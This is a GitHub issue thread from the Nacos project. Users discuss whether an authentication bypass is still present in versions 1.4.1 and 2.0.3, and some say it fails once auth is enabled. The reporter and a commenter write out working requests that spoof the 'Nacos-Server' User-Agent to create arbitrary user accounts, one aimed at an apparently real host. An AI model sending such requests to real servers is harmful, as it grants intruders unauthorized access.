Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

NacosAuthBypassVulnDetector仍然在最新版本未修复?还是没有新版本继承上去? #7103

Closed
shen771 opened this issue Oct 20, 2021 · 6 comments
Closed

NacosAuthBypassVulnDetector仍然在最新版本未修复?还是没有新版本继承上去? #7103

shen771 opened this issue Oct 20, 2021 · 6 comments
Labels
status/invalid This doesn't seem right

Comments

@shen771
Copy link

shen771 commented Oct 20, 2021

Describe the bug
NacosAuthBypassVulnDetector仍然在最新版本未修复?还是没有新版本继承上去?

Expected behavior
NacosAuthBypassVulnDetector 这个问题我看tag上记录的1.41版本已经fix,但是我实测下载1.41版本的tag和2.03版本的tag,仍然实测可以添加任意登录账户

-[#4701] Fix bypass authentication(identity) problem.
#4701

version:nacos 1.41的tag包和2.03的tag包
request:
POST /nacos/v1/auth/users?username=1234578&password=123457 HTTP/1.1
Host: xmagnet-nacos.tuhu.cn
User-Agent: Nacos-Server
Content-Length: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1

response:

{"code":200,"message":"create user ok!","data":null}

请问是没有修复?还是版本没有继承上去?
@fangzhengjin
Copy link

我这边开着权限认证没有这个问题, 直接返回

{
  "error": "Forbidden",
  "message": "unknown user!",
  "path": "/nacos/v1/auth/users",
  "status": 403,
  "timestamp": "2021-10-20T15:53:07.809+08:00"
}

@javaalpha
Copy link

http://console.nacos.io/nacos/v1/auth/users?pageNo=1&pageSize=9 官网的实例控制台也存在此漏洞,等着修复的版本

@realJackSun realJackSun added this to the 2.1.0 milestone Oct 22, 2021
@realJackSun realJackSun added contribution welcome kind/discussion Category issues related to discussion and removed contribution welcome labels Oct 22, 2021
@myoss
Copy link

myoss commented Oct 26, 2021

nacos-sever: 2.0.3, post add user success, is this correct?

curl --location --request POST 'http://nacos.example.com/nacos/v1/auth/users' \
--header 'User-Agent: Nacos-Server' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'username=testqwe' \
--data-urlencode 'password=testa'

@lc76226zq
Copy link

我这边docker里面开着权限认证也不会有这个问题
[root@k8s-master01 ~]# curl http://172.16.16.30:8848/nacos/v1/auth/users?username=1234578&password=123457
[1] 5941
[root@k8s-master01 ~]# {"timestamp":"2021-11-22T10:45:41.579+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}

NACOS_AUTH_ENABLE=true
例如,可以通过如下命令运行开启了鉴权的容器:

docker run --env PREFER_HOST_MODE=hostname --env MODE=standalone --env NACOS_AUTH_ENABLE=true-p 8848:8848 nacos/nacos-server

@NagaResst
Copy link

配置文件里修改
nacos.core.auth.enabled=true
nacos.core.auth.enable.userAgentAuthWhite=true
改完重启试试,默认是相反的

@realJackSun realJackSun modified the milestones: 2.0.4, 2.1.0 Jan 14, 2022
@KomachiSion KomachiSion removed this from the 2.1.0 milestone Mar 31, 2022
@KomachiSion KomachiSion added status/invalid This doesn't seem right and removed kind/discussion Category issues related to discussion labels Mar 31, 2022
@ghjx
Copy link

ghjx commented Sep 17, 2024
edited
Loading

@threedr3am 实测下载1.41版本的标签和2.03版本的标签,仍然实测可以添加任意登录账户

-[ https://github.com//issues/4701 ] 修复绕过身份验证(identity)问题。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
status/invalid This doesn't seem right
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
9 participants
@myoss @fangzhengjin @javaalpha @lc76226zq @ghjx @KomachiSion @shen771 @NagaResst @realJackSun